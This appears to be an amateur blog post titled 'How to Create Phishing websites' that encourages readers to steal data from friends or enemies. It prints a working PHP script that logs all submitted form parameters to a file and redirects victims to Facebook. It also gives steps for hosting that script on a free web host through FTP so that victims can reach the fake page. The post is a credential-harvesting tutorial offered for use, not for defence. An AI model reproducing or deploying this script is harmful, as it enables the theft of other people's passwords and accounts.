How to Create Phishing websites???
Hello friends 👋
I'm here to show you how to make phishing sites for 🤫 Hacking or Stealing some Useful Data of your friend or enemy's.🤫👽
Phishing is the technique to create a similar type of web page to the existing web page.
So let's Start here you can follow the following Steps.....🤫🤫
So, here’s the php script.
<?php
header(“Location: https://www.facebook.com”);
$handle = fopen(“logs.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Just copy this script and paste it down to your notepad file and then save this file with a name post.php
Hosting the PHP File for Password Storing:
Now here is the juicy part, making your fake website online so other people can browse it.
You can use any free hosting services to host and store passwords. However, the hosting plan has to include something called "FTP". For this tutorial, I will be using 000webhost.
Navigate to the FTP Server for Your Web Hosting Service:
For this step, I assume that you have already created a website with your hosting service.
For 000webhost, you simply click on "File manager" and click "Upload Files". Here is a picture of the FTP server for 000webhost:
🤭🤭🤭🤫🤫🤫👽👽👽
Thanks for Reading my blog. Hope you find something best 😘😊.
Comments
Post a Comment